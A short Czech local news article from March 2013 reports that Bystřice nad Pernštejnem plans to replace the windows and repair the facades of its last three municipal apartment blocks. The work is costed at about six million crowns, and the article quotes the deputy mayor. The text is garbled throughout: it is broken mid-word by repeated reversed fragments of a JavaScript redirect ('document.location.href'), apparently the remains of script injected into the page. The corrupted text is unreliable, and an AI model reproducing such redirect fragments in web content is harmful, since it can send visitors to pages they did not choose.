Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, bytové domy, výměna, okna
Rainbow page separator

Na sídlišti vymění zbývající okna

Středa, 27. března 2013

Bystřice nad Pernštejnem / V květnu mají být zahájeny stavební práce na opravě fasád a výměně oken u posledních třech by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů v bystřickém sídlišti 1. Všechny ostatní městské domy už jsou opraveny. „Jde o čísla popisná 915-917, 918-920 a 888-890. V současné době probíhá výběrové řízení na zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele stavby,“ informoval bystřický mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Josef Vojta.

Veškerá stavební činnost by měla být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova s největší pravděpodobností do konce prázdnin. Harmonogram prací bude upřesněn poté, co bude prostřednictvím výběrového řízení vybrána stavební firma. V rozpočtu Bystřice je na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to investiční akci počínáno zhruba se šesti miliony korun. „Obyvatelé dotčených domů budou o podrobném průběhu stavebních prací včas informováni,“ doplnil mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta.

V posledních třech letech Bystřičtí opravují městské domy z prostředků města, předtím, pokud [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo možné, využívali k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu vhodné dotační tituly.